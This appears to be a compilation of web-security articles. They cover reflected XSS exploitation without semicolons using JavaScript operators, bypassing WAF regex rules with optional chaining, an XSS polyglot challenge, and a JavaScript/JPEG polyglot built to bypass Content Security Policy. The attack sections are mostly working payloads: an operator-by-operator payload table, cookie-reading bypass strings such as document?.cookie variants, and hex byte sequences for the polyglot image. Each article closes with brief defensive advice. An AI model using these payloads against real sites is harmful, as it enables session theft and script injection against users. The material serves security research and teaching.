The strtr function removes all semicolon characters from the string. The sanitized input is then used inside a JavaScript function to do something.

You can find something similar in an awesome Labs by PortSwigger:

https://portswigger.net/web-security/cross-site-scripting/contexts

https://portswigger.net/web-security/cross-site-scripting/contexts/lab-onclick-event-angle-brackets-double-quotes-html-encoded-single-quotes-backslash-escaped

If you want to run my vulnerable web application example, just copy and paste the command below and point your browser to http://localhost:9000 you should find it useful in order to test all the example payloads in this article.

curl -s 'https://gist.githubusercontent.com/theMiddleBlue/a098f37fbc08b47b2f2ddad8d1579b21/raw/103a1ccb2e46e22a35cc982a49a41b7d0/index.php' > index.php; php -S 0.0.0.0:9000

Injection

As you can guess, in my example the user arg is vulnerable to reflected XSS in JavaScript context. Without sanitization and validation of what a user put in the user arg, it would be possible to exploit a reflected XSS with a simple injection like /?user=foo');alert('XSS. There’re two important things in this specific scenario:

  1. Due to the sanitization function, it isn’t possible to «close» the JavaScript function myFunction and start a new function using the semicolon character (by injecting something like ');alert(' the semicolon character will be removed before printing it on the response body).
  2. Due to its context, the injected payload (even encoded by htmlentities) is decoded by the user’s browser when clicking on the link. This means that the browser will decode the encoded single quote character.

Exploit using Arithmetic Operators

It is possible to exploit the XSS vulnerability in this specific JavaScript context without using any semicolon character by using JavaScript Arithmetic Operators, Bitwise Operators, Logical AND/OR Operators, etc… Consider the following example:

the first console.log function prints 1337, the difference between 1338 and 1. The second one returns NaN (Not a Number). As you can see in the screenshot, before returning NaN JavaScript executes alert(1) first and then performs the subtraction operation. We can use this condition to exploit the XSS vulnerability in our example to avoid using a semicolon.

The payload could be the following:

As you can see, the alert function went executed before the subtraction, and this means that we can execute any JavaScript function without using the sanitized semicolon character.

How many operators can be used to exploit XSS here?

Subtraction is not the only operator that you can use in this kind of exploit. Below you can find an incomplete list of operators with a working payload (when applicable) and an example that you can test in your JavaScript console by copy&paste it:

OPERATORSWORKING PAYLOADSCOPY&PASTE EXAMPLE
Addition (+)foo’)%2balert(‘aconsole.log(‘a’+alert(1))
Bitwise AND (&)N/Aconsole.log(‘a’&alert(1))
Bitwise OR (|)foo’)|alert(‘aconsole.log(‘a’|alert(1))
Bitwise XOR (^)foo’)^alert(‘aconsole.log(‘a’^alert(1))
Comma operator (,)foo’),alert(‘aconsole.log(‘a’,alert(1))
Conditional (ternary) operatorfoo’)%3falert(‘a’):alert(‘bconsole.log(‘a’?alert(1):»)
Division (/)foo’)/alert(‘aconsole.log(‘a’/alert(1))
Equality (==)foo’)==alert(‘aconsole.log(‘a’==alert(1))
Exponentiation (**)foo’)**alert(‘aconsole.log(‘a’**alert(1))
Greater/Less than (>/<)N/Aconsole.log(‘a’>alert(1))
Greater/Less than or equal (>=|<=)N/Aconsole.log(‘a’>=alert(1))
Inequality (!=)foo’)!=alert(‘aconsole.log(‘a’!=alert(1))
Left/Right shift (>>|<<)N/Aconsole.log(‘a'<<alert(1))
Logical AND (&&)N/Aconsole.log(‘a’&&alert(1))
Logical OR (||)foo’)||alert(‘aconsole.log(false||alert(1))
Multiplication (*)foo’)*alert(‘aconsole.log(‘a’*alert(1))
Remainder (%)foo’)%alert(‘console.log(‘a’%alert(1))
Subtraction (-)foo’)-alert(‘console.log(‘a’-alert(1))
In Operatorfoo’) in alert(‘console.log(‘a’ in alert(1))

In the specific case of our customer’s web application, characters &< and > are encoded by htmlentities so it prevents use of operators «Bitwise AND», «Greater/Less than» and «Greater/Less then or equal». All other operators can be used to leads user’s browser to execute JavaScript functions. For example:

Exploit using Optional Chaining (?.)

Some Web Application Firewall Rule Set try to prevent XSS by validating untrusted user input against a list of JavaScript functions. Something like the following Regular Expression:

/(alert|eval|string|decodeURI|...)[(]/

As you can see, the first two syntaxes would be blocked by the WAF, but the last two don’t match the regex. Indeed a really basic technique to bypass a weak rule is to insert white spaces or comment between the function name and the first round-bracket. If you use ModSecurity of course you know that is easy to fix this kind of bypass by using the transformation functions removeWhitespace (removes all whitespace characters from input) and removeCommentsChar (removes common comments chars such as: /*, */, —, #) as the following example:

SecRule ARGS "@rx /(alert|eval|string|decodeURI|...)[(]/" \
    "id:123,\
    t:removeWhitespace,\
    t:removeCommentsChar,\
    block"

Anyway it’s possible to bypass this specific rule by using the optional chaining operator:

The optional chaining operator (?.) permits reading the value of a property located deep within a chain of connected objects without having to expressly validate that each reference in the chain is valid. The ?. operator functions similarly to the . chaining operator, except that instead of causing an error if a reference is nullish (null or undefined), the expression short-circuits with a return value of undefined. When used with function calls, it returns undefined if the given function does not exist.

Using this operator we can bypass the ModSecurity rule shown before, and the payload becomes something like this:

If you want to try it, open your browser JavaScript console and paste the following:

console.log('',alert?.('XSS'))

Used as payload on our vulnerable web application, we can exploit the XSS bypassing both HTML entities encoding and Web Application Firewall rule:

Moreover, this operator should be used to bypass other «bad word» based WAF rules such as document.cookie with document?.cookie. Following a list of examples that you can use and you can test on your browser console:alert ?. (document ?. cookie)

self?.[‘al’+’ert’/* foo bar */]?.(‘XSS’)

true in alert /* foo */ ?. /* bar */ (/XSS/)

1 * alert ?. (/* foo */’XSS’/* bar */)

true, alert ?. (…[/XSS/])

true in self ?. [/alert/.source](/XSS/)

self ?. [/alert/ ?. source ?. toString()](/XSS/)

Conclusion

Never ever HTML entity encode untrusted data to sanitize user input and don’t make your own WAF rule to validate it. Use a security encoding library for your app and use the OWASP CRS as a Web Application Firewall Rule Set.

References

XSS Polyglot Challenge v2

( Original text by @filedescriptor )

alert() in more than one context.


What is a XSS Polyglot?

A XSS payload which runs in multiple contexts. For example, '--><svg onload=alert()> can pop alerts in <div class=''--><svg onload=alert()>'></div> and <!--'--><svg onload=alert()>-->. It is useful in testing XSS because it minimizes manual efforts and increases the success rate of blind XSS.

Rules
  • You will be given 20 common contexts in black-box
  • No DOM sinks or external libraries are involved
  • Plain HTML injection with minimum filtering
  • A headless Chrome will try your payload
  • Your payload should run alert() in 2+ contexts
  • Payloads exceeding 1024 characters will always fail
  • Network is disabled
Contexts
<div class="{{payload}}"></div>
<div class='{{payload}}'></div>
<title>{{payload}}</title>
<textarea>{{payload}}</textarea>
<style>{{payload}}</style>
<noscript>{{payload}}</noscript>
<noembed>{{payload}}</noembed>
<template>{{payload}}</template>
<frameset>{{payload}}</frameset>
<select><option>{{payload}}</option></select>
<script type="text/template">{{payload}}</script>
<!--{{payload}}-->
<iframe src="{{payload}}"></iframe> " → 
<iframe srcdoc="{{payload}}"></iframe> " →  < → 
<script>"{{payload}}"</script> </script → <\/script
<script>'{{payload}}'</script> </script → <\/script
<script>`{{payload}}`</script> </script → <\/script
<script>//{{payload}}</script> </script → <\/script
<script>/*{{payload}}*/</script> </script → <\/script
<script>"{{payload}}"</script> </script → <\/script " → \"

more examples by link

Bypassing CSP using polyglot JPEGs

James challenged me to see if it was possible to create a polyglot JavaScript/JPEG. Doing so would allow me to bypass CSP on almost any website that hosts user-uploaded images on the same domain. I gleefully took up the challenge and begun dissecting the format. The first four bytes are a valid non-ASCII JavaScript variable 0xFF 0xD8 0xFF 0xE0. Then the next two bytes specify the length of the JPEG header. If we make that length of the header 0x2F2A using the bytes 0x2F 0x2A as you might guess we have a non-ASCII variable followed by a multi-line JavaScript comment. We then have to pad out the JPEG header to the length of 0x2F2A with nulls. Here’s what it looks like:

FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 00 00 00 00 00 00 00 00....

Inside a JPEG comment we can close the JavaScript comment and create an assignment for our non-ASCII JavaScript variable followed by our payload, then create another multi-line comment at the end of the JPEG comment.

FF FE 00 1C 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A

0xFF 0xFE is the comment header 0x00 0x1C specifies the length of the comment then the rest is our JavaScript payload which is of course */=alert(«Burp rocks.»)/*

Next we need to close the JavaScript comment, I edited the last four bytes of the image data before the end of image marker. Here’s what the end of the file looks like:

2A 2F 2F 2F FF D9

0xFF 0xD9 is the end of image marker. Great so there is our polyglot JPEG, well not quite yet. It works great if you don’t specify a charset but on Firefox when using a UTF-8 character set for the document it corrupts our polyglot when included as an script! On MDN it doesn’t state that the script supports the charset attribute but it does. So to get the script to work you need to specify the ISO-8859-1 charset on the script tag and it executes fine.

It’s worth noting that the polyglot JPEG works on Safari, Firefox, Edge and IE11. Chrome sensibly does not execute the image as JavaScript.

Here is the polyglot JPEG:

Polyglot JPEG

The code to execute the image as JavaScript is as follows:

<script charset="ISO-8859-1" src="http://portswigger-labs.net/polyglot/jpeg/xss.jpg"></script>

File size restrictions

I attempted to upload this graphic as a phpBB profile picture but it has restrictions in place. There is a 6k file size limit and maximum dimensions of 90×90. I reduced the size of the logo by cropping and thought about how I could reduce the JPEG data. In the JPEG header I use /* which in hex is 0x2F and 0x2A, combined 0x2F2A which results in a length of 12074 which is a lot of padding and will result in a graphic far too big to fit as a profile picture. Looking at the ASCII table I tried to find a combination of characters that would be valid JavaScript and reduce the amount of padding required in the JPEG header whilst still being recognised as a valid JPEG file.

The smallest starting byte I could find was 0x9 (a tab character) followed by 0x3A (a colon) which results in a combined hex value of 0x093A (2362) that shaves a lot of bytes from our file and creates a valid non-ASCII JavaScript label statement, followed by a variable using the JFIF identifier. Then I place a forward slash 0x2F instead of the NULL character at the end of the JFIF identifier and an asterisk as the version number. Here’s what the hex looks like:

FF D8 FF E0 09 3A 4A 46 49 46 2F 2A

Now we continue the rest of the JPEG header then pad with NULLs and inject our JavaScript payload:

FF D8 FF E0 09 3A 4A 46 49 46 2F 2A 01 01 00 48 00 48 00 00 00 00 00 00 00 ... (padding more nulls) 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A

Here is the smaller graphic:

Polyglot JPEG smaller

Impact

If you allow users to upload JPEGs, these uploads are on the same domain as your app, and your CSP allows script from «self», you can bypass the CSP using a polyglot JPEG by injecting a script and pointing it to that image.

Conclusion

In conclusion if you allow JPEG uploads on your site or indeed any type of file, it’s worth placing these assets on a separate domain. When validating a JPEG, you should rewrite the JPEG header to ensure no code is sneaked in there and remove all JPEG comments. Obviously it’s also essential that your CSP does not whitelist your image assets domain for script.

This post wouldn’t be possible without the excellent work of Ange Albertini. I used his JPEG format graphicextensively to create the polygot JPEG. Jasvir Nagra also inspired me with his blog post about polyglot GIFs.

PoC